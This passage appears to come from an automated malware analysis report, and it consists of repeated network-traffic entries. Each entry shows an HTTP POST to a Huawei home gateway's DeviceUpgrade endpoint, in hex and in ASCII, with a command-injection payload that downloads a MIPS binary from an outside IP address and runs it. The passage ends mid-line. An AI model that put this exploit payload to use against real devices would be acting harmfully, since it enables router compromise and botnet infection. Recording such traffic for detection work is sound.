/t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 